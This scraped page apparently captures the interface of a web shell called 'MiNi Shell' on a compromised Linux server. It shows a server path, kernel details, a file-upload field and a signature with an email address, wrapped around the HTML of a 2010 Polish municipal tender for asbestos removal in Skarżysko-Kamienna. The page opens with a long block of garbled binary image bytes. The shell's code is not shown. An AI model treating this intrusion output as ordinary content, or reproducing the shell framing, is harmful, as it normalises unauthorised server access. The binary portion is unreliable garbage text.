JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100311/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100311/67542-N-2010.html

<p class="kh_header"><b>Skarżysko-Kamienna: Usuwanie wyrobów zawierających azbest z pokryć dachowych, ścian budynków i nieruchomości stanowiących własność osób fizycznych oraz budynków będących w zasobach Gminy Skarżysko-Kamienna</b><br>
<b>Numer ogłoszenia: 67542 - 2010; data zamieszczenia: 11.03.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasto Skarżysko-Kamienna , ul. Sikorskiego 18, 26-110 Skarżysko-Kamienna, woj. świętokrzyskie, tel. 041 2520100, faks 041 2520200.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.skarzysko.bip.doc.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usuwanie wyrobów zawierających azbest z pokryć dachowych, ścian budynków i nieruchomości stanowiących własność osób fizycznych oraz budynków będących w zasobach Gminy Skarżysko-Kamienna.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.1.Przedmiot niniejszego zamówienia stanowi:
Przedmiot zamówienia obejmuje usługi w zakresie:
-  demontażu płyt azbestowo - cementowych z dachów i ścian budynków znajdujących się na terenie gminy Skarżysko-Kamienna, 
- załadunku i transportu odpadów zawierających azbest i ich utylizacja na przystosowanym do tego celu składowisku odpadów.   
1.1.1. Demontaż wyrobów zawierających azbest
Wykonawca prac jest obowiązany do zachowania wszelkich przepisów prawa budowlanego, bhp oraz postępowania z wyrobami zawierającymi azbest, a w szczególności:
1.zabezpieczy obiekt oraz teren wokół niego przed rozprzestrzenianiem się pyłów azbestu,
2.ogrodzi teren z zachowaniem bezpiecznej odległości od traktów komunikacyjnych dla osób pieszych,
3.umieści tablicę ostrzegawczą o treści: Uwaga ! Zagrożenie azbestem oraz Osobom nieupoważnionym wstęp wzbroniony, 
4.skompletuje wyposażenie techniczne umożliwiające prawidłowy przebieg prac budowlanych, 
5.zastosuje w obiekcie odpowiednie zabezpieczenia przed pyleniem 
i narażeniem na azbest, w tym zabezpieczenia przewidziane w planie bezpieczeństwa i ochrony zdrowia,
6.przygotuje stanowiska gromadzenia odpadów zawierających azbest, zabezpieczone przed dostępem osób niepowołanych, 
7.nawilży wodą wyroby zawierające azbest przed ich demontażem i utrzymywać je będzie w stanie wilgotnym przez cały czas pracy, 
8.zdemontuje tam, gdzie jest to możliwe wyroby azbestowo - cementowe 
w całości, 
9.po wykonaniu prac teren robót i jego otoczenie zostaną starannie oczyszczone z wykorzystaniem podciśnieniowego sprzętu odkurzającego lub metodą czyszczenia na mokro. 
1.1.2. Transport odpadów zawierających azbest
1. Podmiot gospodarczy świadczący usługi polegające na transporcie odpadów obowiązany jest posiadać zezwolenie na transport odpadów niebezpiecznych zawierających azbest, wydaneprzez starostę właściwego ze względu na miejsce siedziby podmiotu gospodarczego. 
2. Środek transportu, przed załadowaniem odpadów powinien być oczyszczony z elementów umożliwiających uszkodzenie opakowań w trakcie transportu. 
3. Przewóz odpadów azbestowych odbywać się będzie odpowiednio przystosowanymi i oznakowanymi pojazdami, zgodnie z wymaganiami dotyczącymi transportu odpadów niebezpiecznych. 
4. Załadunek i rozładunek odpadów odbywać się będzie przy wykorzystaniu dźwigu lub podnośnika. 
5. Odpady w trakcie przygotowania ich do transportu utrzymywać w stanie wilgotnym.
6. Opakowane, przygotowane do transportu partie odpadów będą ułożone
i umocowane na pojeździe w sposób uniemożliwiający ich przesuwanie, przewracanie i wypadnięcie z pojazdu. 
7. Po każdym wyładunku odpadów pojazd będzie wyczyszczony z zachowaniem środków ostrożności przewidzianych dla prac przy usuwaniu azbestu. 
8. Odpady zawierające azbest należy odpowiednio oznakować, a transport odpadów wykonywać w sposób uniemożliwiający emisję azbestu do środowiska.
1.1.3. Składowanie odpadów zawierających azbest
1. Odpady zawierające azbest będą składowane na specjalnych składowiskach przystosowanych do tego celu. Tam nastąpi ich przekazanie następnemu posiadaczowi odpadów - zarządzającemu składowiskiem i potwierdzenie tego faktu w Karcie przekazania odpadu. 
2. Opakowania z odpadami należy zdejmować z pojazdu przy użyciu urządzeń dźwigowych i ostrożnie układać w kwaterze składowiska. 
3. Niedopuszczalne jest zrzucanie lub wysypywanie odpadów z samochodów.
4. Opakowania z odpadami powinny być układane zgodnie z technologią składowania zatwierdzoną w instrukcji eksploatacji składowiska, uwzględniającą racjonalne wykorzystanie pojemności obiektu.  
1.2. Wymogi dotyczące usuwania wyrobów zawierających azbest
1. Prace związane z usuwaniem wyrobów zawierających azbest realizowane będą 
w porozumieniu Wykonawcy z właścicielami nieruchomości, w przypadku budynków  stanowiących własność Gminy z ich zarządcami, a po zakończeniu prac obowiązkiem Wykonawcy będzie złożenie właścicielowi, użytkownikowi wieczystemu lub zarządcy pisemnego oświadczenia o prawidłowości wykonania prac oraz 
oczyszczeniu terenu z pyłu azbestowego, z zachowaniem właściwych przepisów    
technicznych i sanitarnych.
2. Z czynności demontażu zostanie spisany protokół stwierdzający:
  a. ilość zdemontowanych odpadów tj. powierzchnia w m2,  
  b. fakt należytego wykonania prac demontażowych. W przypadku stwierdzenia wad w wykonawstwie robót Wykonawca zobowiąże się do ich usunięcia w terminie 
określonym w protokole. 
3. Wykonawca przed rozpoczęciem prac demontażowych opracuje szczegółowy plan prac usuwania wyrobów zawierających azbest zgodnie z § 6 ust. 1 pkt 3 -  
Rozporządzenia Ministra Gospodarki, Pracy i Polityki Społecznej z dnia 
2 kwietnia 2004r. w sprawie sposobów i warunków bezpiecznego użytkowania 
 i usuwania wyrobów zawierających azbest  Dz. U. z 2004r. Nr 71 poz. 649.
4 Wykonawca zgłosi zamiar przystąpienia do wykonywania prac demontażowych  
 właściwemu organowi nadzoru budowlanego i właściwemu okręgowemu inspektorowi pracy zgodnie z § 6 ust. 2, ust. 3 rozporządzenia Ministra Gospodarki,  Pracy i Polityki Społecznej z dnia 2 kwietnia 2004r. w sprawie sposobów i warunków bezpiecznego użytkowania i usuwania wyrobów zawierających azbest Dz. U. z 2004r. Nr 71 poz. 649,
5. Transport wyrobów i odpadów zawierających azbest Wykonawca  przeprowadzi 
w sposób uniemożliwiający emisję azbestu do środowiska, w szczególności przez: 
a. szczelne opakowanie w folię polietylenową o grubości nie mniejszej niż 0,2 mm   
wyrobów i odpadów o gęstości objętościowej równej lub większej niż 1000kg/m3,
b. zestalenie przy użyciu cementu, a następnie po utwardzeniu szczelne opakowanie w folię polietylenową o grubości nie mniejszej niż 0,2 mmm odpadów  
zawierających azbest o gęstości objętościowej mniejszej niż 1000 kg/m3 ,
c. oznakowanie wyrobów, odpadów i opakowań zawierających azbest,
- na opakowaniach z odpadami zawierającymi azbest umieści oznakowanie zgodnie
z obowiązującymi przepisami (wzór oznakowania wyrobów, odpadów 
i opakowań zwierających azbest lub wyroby zawierające azbest, a także miejsc ich  występowania), stanowiący załącznik nr 2 do Rozporządzenia Ministra Gospodarki , Pracy i Polityki Społecznej z dnia 2 kwietnia 2004r. Dz. U. z 2004r. Nr 71 poz. 649
- magazynowanie przygotowanych do transportu opakowań w osobnych miejscach 
zabezpieczonych przed dostępem osób niepowołanych.     
6. Usługi objęte niniejszym przetargiem będą zlecane sukcesywnie, w miarę potrzeb. 
Zamawiający określi je każdorazowo w pisemnym zleceniu, podając zakres prac.  Termin ustalany będzie z posiadaczem nieruchomości bądź zarządcą na podstawie  
umowy. Zleceniodawca nie przewiduje minimalnej ani maksymalnej gwarantowanej 
ilości zgłaszanych robót.

7.  Planowana ilość max.  27.870m2 ilość łączna bez względu na rodzaj tj. budynki mieszkalne oraz inne obiekty, nie będące budynkami mieszkalnymi, a także wywóz z nieruchomości może ona ulec zmniejszeniu o ile właściciele budynków odstąpią od umowy z Zamawiającym. 
8. Wynagrodzenie wykonawcy będzie ustalane na podstawie ceny jednostkowej oraz ilości rzeczywiście wykonanych i odebranych usług. Wystawianie przez Wykonawcę faktur odbywać się będzie odrębnie dla każdej nieruchomości, na której Zleceniodawca zlecił wykonanie usługi. Podstawą do wystawienia faktury przez Wykonawcę będzie: bezusterkowy protokół z demontażu, karta przekazania odpadu na składowisko określająca ilość przekazanych odpadów lub protokół określający ilość w m2     wyrobów zawierających azbest wywiezionych z nieruchomości. Jeżeli na karcie przekazania odpadu ilość zostanie określona w jednostkach wagowych, Zamawiający zastosuje przelicznik 1m2 = 15kg. Termin płatności będzie wynosił 30 dni.                  
8. Wykonawca zobowiązany jest do stałego współdziałania z Zamawiającym,  koordynującym całością prac objętych niniejszym zamówieniem..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.65.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-  Przedłożyć aktualną decyzję zatwierdzająca program gospodarki odpadami niebezpiecznymi zawierającymi azbest lub decyzję zezwalającą na wytwarzanie odpadów zawierających azbest, wydane przez Starostę Skarżyskiego.

- Zezwolenie na transport odpadów niebezpiecznych lub podpisaną umowę (porozumienie) z firmą transportową posiadającą takie zezwolenie (w takim przypadku do umowy należy dołączyć zezwolenie na transport odpadów niebezpiecznych wydane dla firmy transportowej z którą podpisano umowę). 

- Umowę z właścicielem specjalistycznego składowiska odpadów niebezpiecznych posiadającego odpowiednie dopuszczenia w tym zakresie na zdeponowanie odpadów azbestowo-cementowych. 

Ocena spełnienia warunków na podstawie w/w dokumentów według kryteriów spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełniania niniejszego warunku wykonawcy zobowiązani są   przedłożyć   wykaz   wykonanych   usług   sporządzony   według   wzoru  stanowiącego załącznik nr 3 do niniejszych WP oraz dokumenty potwierdzające, że usługi te zostały wykonane należycie.

Ocena spełnienia warunków na podstawie w/w dokumentów według kryteriów spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia z art. 22 ust 1 Pzp, według kryteriów spełnia /nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia z art. 22 ust 1 Pzp, według kryteriów spełnia /nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia z art. 22 ust 1 Pzp, według kryteriów spełnia /nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana umowy jest możliwa , z zastrzeżeniem art. 144 ustawy Pzp, w następującym zakresie:
- ceny  brutto - w przypadku urzędowej zmiany stawki podatku VAT.
- danych objętych fakturą w szczególności adresów, numeru NIP, numerów rachunków 
- osób wskazanych w umowie jako reprezentujących strony  niżej wymienionych</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.um.skarzysko.bip.doc.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta ul. Sikorskiego 18 , 26-110 Skarżysko-Kamienna.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.03.2010 godzina 10:45, miejsce: Urząd Miasta ul. Sikorskiego 18 26-110 Skarżysko-Kamienna Sekretariat Prezydenta Miasta - I piętro pok. Nr 45.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com